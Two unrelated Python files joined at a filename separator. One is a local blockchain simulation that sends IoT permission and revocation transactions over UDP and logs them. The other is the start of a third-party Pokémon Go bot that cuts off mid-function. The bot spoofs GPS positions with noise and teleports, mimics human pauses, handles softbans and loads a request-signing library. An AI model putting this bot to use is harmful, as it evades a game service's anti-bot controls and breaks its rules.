first_value = pbft_d[keys[0]]
ct_count += 1
for i in range(1, len(pbft_d)):
if pbft_d[keys[i]] == first_value:
ct_count += 1
if ct_count >= desired_count:
if pid != int(data[1]):
block = json.loads(data[3])
node.chain.append(block)
# lock.acquire()
# commit_counter += 1
# lock.release()
# sleep(0.00001)
# commit_counter += 1
pbft_d = {}
if count > 0:
if MINE_MINT == 0:
ret = mine(node)
count = 0
# print ("MINE: ", ret)
# print ("MINE: ",pid)
elif MINE_MINT == 1:
ret = mint(node, total_nodes, pid, sock, PORTFACTOR)
count = 0
# print ("MINT: ", pid)
def test_transaction_generator_all_nodes(sock, value):
# serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+0)
# message = 'This is the message. It will be repeated.'
# print (len(private_keys_d), len(public_keys_d))
# value = 'A-B'
gen_trans = generate_transaction(node_address_d[0], private_keys_d[0], node_address_d[1], value)
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
print ('sending trans to "%s"' % str(server_address))
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
def transaction_set_generator(sock, node_id):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
print ("transaction_set_generator:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_generator_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def transaction_set_revoker_and_get_delayed(sock, node_id, lock):
# global lock
global commit_counter
total_trans = 0
trans_log = ""
get_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
lock.acquire()
try:
commit_counter = 0
finally:
lock.release()
print ("ST:", commit_counter)
fh_1 = open("./logs/transaction_set_revoker_and_get_delayed_GETRESP_LOG_"+log_suffix, "w")
while iot_1 < IOT1:
print ("REV:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE TRANSACTION
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val = "REV,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
trans_log += val+"\n"
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get_delayed: ", EE)
# delay = float(random.randint(1,20))/1000.0 #10
delay = float(random.randint(1,50))/1000.0 #10
# delay = float(random.randint(17,100))/1000.0 # 15
# print (delay)
sleep(delay)
temp_ts = current_time_us()
y = 0
# serv_port = PORTFACTOR+2
# serv_port = PORTFACTOR+int(total_nodes/2)+1
serv_port = PORTFACTOR+int(total_nodes)-1
# while commit_counter < 2:
# while commit_counter < int(total_nodes/2)+1:
while commit_counter < int(total_nodes)-1:
# while commit_counter < 3:
# lock.acquire()
# try:
# if commit_counter < int(total_nodes)-1:
# y = -10
# finally:
# lock.release()
# lock.acquire()
# # if commit_counter >= 1:
# if commit_counter >= int(total_nodes/2)+1:
# # if commit_counter >= int(total_nodes)-1:
# y = -10
# lock.release()
# sleep(0.015)
# y = 1
sleep(0.019)
y += 1
if y > 200 or y < 0: # 20000000 = 1sec; 10000000 = 0.5sec //y > 20000000 or
break
lock.acquire()
print (commit_counter)
commit_counter = 0
lock.release()
# GET
value = str(iot_1)+"-"+str(iot_2)
message = "FT"+">"+str(value)
try:
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val += ",FT,"+str(temp_ts)+","+ str(serv_port)+","+str(server_address) + "," + value
# get_log += val
data, address = sock.recvfrom(4096)
data = data.decode()
val += ",RESP,"+str(data) + "," + str(address) + "\n"
# print (rep)
fh_1.write(val)
# get_log += val
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get_delayed: ", EE)
sleep(0.05)
# sleep(0.001)
iot_1 += 1
fh_1.close()
fh = open("./logs/transaction_set_revoker_and_get_delayed_REVOKE_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def transaction_set_revoker_and_get(sock, node_id):
total_trans = 0
trans_log = ""
get_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
while iot_1 < IOT1:
print ("transaction_set_revoker_and_get:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE TRANSACTION
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
serv_port = PORTFACTOR+node_id
# serv_port = PORTFACTOR+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val = "REV,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
trans_log += val+"\n"
except Exception as EE:
print ("Exeception transaction_set_revoker_and_get: ", EE)
# GET
value = str(iot_1)+"-"+str(iot_2)
message = "FT"+">"+str(value)
try:
# serv_port = PORTFACTOR+int(total_nodes/2)+1
serv_port = PORTFACTOR+1
server_address = ('localhost', serv_port)
sent = sock.sendto(message.encode(), server_address)
val += ",FT,"+str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value
# get_log += val
data, address = sock.recvfrom(4096)
data = data.decode()
val += ",RESP,"+str(data) + "," + str(address) + "\n"
# print (rep)
get_log += val
except Exception as EE:
print ("Exeception get_persmission_value: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_revoker_and_get_REVOKE_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
fh = open("./logs/transaction_set_revoker_and_get_GETRESP_LOG_"+log_suffix, "w")
fh.write(get_log)
fh.close()
# To be ran in multi threading
def transaction_set_revoker(sock, node_id):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
# print ("REV:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)+'~'
gen_trans = generate_transaction(node_address_d[node_id], private_keys_d[node_id], node_address_d[node_id+1], value)
# REVOKE
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
sent = sock.sendto(message.encode(), server_address)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
except Exception as EE:
print ("Exeception transaction_set_revoker: ", EE)
# sleep(0.001)
iot_1 += 1
fh = open("./logs/transaction_set_revoker_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
def get_persmission_value(sock, node_id):
total_trans = 0
trans_log = ""
resp_log = ""
iot_1 = 1
iot_2 = 1
revoke = 0
serv_port = PORTFACTOR+node_id+1
server_address = ('localhost', serv_port)
while iot_1 < IOT1:
# print ("GET:", iot_1)
for i in range(1, IOT2):
iot_2 = i
if iot_1 != i:
value = str(iot_1)+"-"+str(iot_2)
val = str(current_time_us())+","+ str(serv_port)+","+str(server_address) + "," + value + "\n"
trans_log += val
# x = json.dumps(value)
message = "FT"+">"+str(value)
try:
sent = sock.sendto(message.encode(), server_address)
data, address = sock.recvfrom(4096)
data = data.decode()
rep = str(data) + "," + str(address) + "\n"
# print (rep)
resp_log += rep
except Exception as EE:
print ("Exeception get_persmission_value: ", EE)
sleep(0.001)
iot_1 += 1
fh = open("./logs/get_persmission_value_LOG_"+log_suffix, "w")
fh.write(trans_log)
fh.close()
fh = open("./logs/get_persmission_value_response_LOG_"+log_suffix, "w")
fh.write(resp_log)
fh.close()
def transaction_generator_all_nodes(sock):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 2
revoke = 0
while total_trans < TOTALTRASPOST:
serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+serv_port)
# message = 'This is the message. It will be repeated.'
# print (len(private_keys_d), len(public_keys_d))
if (revoke % 10) == 0:
value = str(int(iot_1/2))+"-"+str(int(iot_2/3))+"~"
else:
value = str(iot_1)+"-"+str(iot_2)
iot_1 += 1
iot_2 += 1
revoke += 1
gen_trans = generate_transaction(node_address_d[0], private_keys_d[0], node_address_d[1], value)
val = str(current_time_us())+","+str(serv_port) + "," + value + "\n"
trans_log += val
x = json.dumps(gen_trans)
message = 'NT'+">"+x
try:
# print ('sending trans to "%s"' % str(server_address))
sent = sock.sendto(message.encode(), server_address)
except Exception as EE:
print ("Exeception transaction_generator_all_nodes: ", EE)
total_trans += 1
sleep(0.1)
fh = open("./logs/trans_logs", "w")
fh.write(trans_log)
fh.close()
def transaction_fetcher(sock):
total_trans = 0
trans_log = ""
iot_1 = 1
iot_2 = 2
revoke = 0
print ("\n\n transaction_fetcher\n\n")
while total_trans < TOTALTRASFETCH:
serv_port = random.randint(0,total_nodes+100) % total_nodes
server_address = ('localhost', PORTFACTOR+serv_port)
iot_1 = random.randint(0,100)
iot_2 = random.randint(0,100)
if iot_1 == iot_2:
iot_2 += 1
if revoke % 5 == 0:
message = 'FT>' + str(iot_1) + '-' + str(iot_2) + '~'
else:
message = 'FT>' + str(iot_1) + '-' + str(iot_2)
print ('FT :', str(server_address), message)
try:
tstamp = str(current_time_us())
sent = sock.sendto(message.encode(), server_address)
data, server = sock.recvfrom(4096)
data = data.decode()
print ("RET:", data)
val = tstamp + "," + str(serv_port) + "," + message + "," + str(data) + "\n"
trans_log += val
except Exception as tf:
print("Exception transaction_fetcher: ". tf)
total_trans += 1
revoke += 1
sleep(0.2)
fh = open("./logs/transaction_fetch_logs", "w")
fh.write(trans_log)
fh.close()
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler)
args = sys.argv[1:]
argc = len(args)
if argc != 6:
print ("Usage Issue. Need 6 Argument.")
print ("python3.7 executer.py <no of nodes> <PoV or PoA> <Port Factor> <IoT_1> <IoT_2> <suffics>")
exit(1)
process_list = []
total_nodes = int(args[0])
MINE_MINT = int(args[1]) # 0 MINE 1 MINT
PORTFACTOR = int(args[2])
IOT1 = int(args[3])
IOT2 = int(args[4])
suffics = args[5]
# t = time()
# y = 0
# while True:
# y += 1
# if y > 10000000:
# break
# print ("TIME: ", time() - t)
# exit(1)
print ("Number of Nodes = ", total_nodes)
if MINE_MINT == 0:
print ("Consensus Algorithm : Proof of Work using Mining")
elif MINE_MINT == 1:
print ("Consensus Algorithm : PBFT")
else:
print ("Please provide Consensus Algorithm : 0 = Mining, 1 = PBFT")
exit(1)
log_suffix = str(total_nodes)+"_"+str(MINE_MINT)+"_"+str(IOT1)+"_"+str(IOT2)+"_"+suffics
for i in range(0, total_nodes):
node_address_d[i] = ""
lock = threading.Lock()
# try:
print (node_address_d)
for i in range(0, total_nodes):
# p = multiprocessing.Process(target=busy_hour, args=(i, source_list[i], dest_path, prefix_list[i]))
p = threading.Thread(target=blockchain_node, args=(i, total_nodes, node_address_d, lock))
process_list.append(p)
p.start()
sleep(0.3)
sleep(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# test_transaction_generator_all_nodes(sock, 'A-B')
# test_transaction_generator_all_nodes(sock, 'A-C')
# transaction_set_generator(sock, 0)
# print ("IOT PERMISSION SET ADDED")
# sleep(1)
# tr = threading.Thread(target=transaction_set_revoker, args=(sock,0))
# gt = threading.Thread(target=get_persmission_value, args=(sock,0))
# gt.start()
# tr.start()
# print ("STARTING REVOKE AND GET THREADS")
# tr.join()
# gt.join()
# print ("REVOKE AND GET THREADS COMPLETE")
print ("ADDING IOT DEVICE PERMISSIONS")
transaction_set_generator(sock, 0)
print ("IOT PERMISSION SET ADDED")
sleep(1)
# print ("Starting transaction_set_revoker_and_get")
# t = threading.Thread(target=transaction_set_revoker_and_get, args=(sock,0))
# t.start()
# t.join()
# print ("End transaction_set_revoker_and_get")
print ("Starting transaction_set_revoker_and_get_delayed")
t = threading.Thread(target=transaction_set_revoker_and_get_delayed, args=(sock,0, lock))
t.start()
t.join()
print ("End transaction_set_revoker_and_get_delayed")
# # add transactions and fetch in parallel
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# p = threading.Thread(target=transaction_generator_all_nodes, args=(sock,))
# process_list.append(p)
# p.start()
# t = threading.Thread(target=transaction_fetcher, args=(sock,))
# process_list.append(t)
# t.start()
# p.join()
# t.join()
# print ("FETCHING ALL")
# sleep(1)
# for i in range(0, total_nodes):
# server_address = ('localhost', PORTFACTOR+i)
# message = "FA>all"
# try:
# print ('sending "%s"' % message)
# sent = sock.sendto(message.encode(), server_address)
# except Exception as E:
# print ("Exception in FA:", E)
# sleep(0.5)
for p in process_list:
p.join()
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler, SocialHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from pokemongo_bot.datastore import _init_database, Datastore
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(Datastore):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
def __init__(self, config):
# Database connection MUST be setup before migrations will work
self.database = _init_database('/data/{}.db'.format(config.username))
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
def start(self):
self._setup_event_system()
self._setup_logging()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
if self.config.logging_color:
handlers.append(ColoredLoggingHandler())
else:
handlers.append(LoggingHandler())
if self.config.enable_social:
handlers.append(SocialHandler(self))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
self.event_manager = EventManager(*handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message: :
# self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'xp', 'candy')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'candy')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
# dont cache when teleport_to
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not self.is_numeric(self.api._auth_provider._ticket_expire):
self.logger.info("Ticket expired value is not numeric", 'yellow')
return
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
while not self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password)):
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login error, server busy. Waiting 10 seconds to try again."
)
time.sleep(10)
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
while True:
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
break
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
break
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'encrypt_64.dll'
else:
file_name = 'encrypt.dll'
else:
file_name = 'encrypt.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
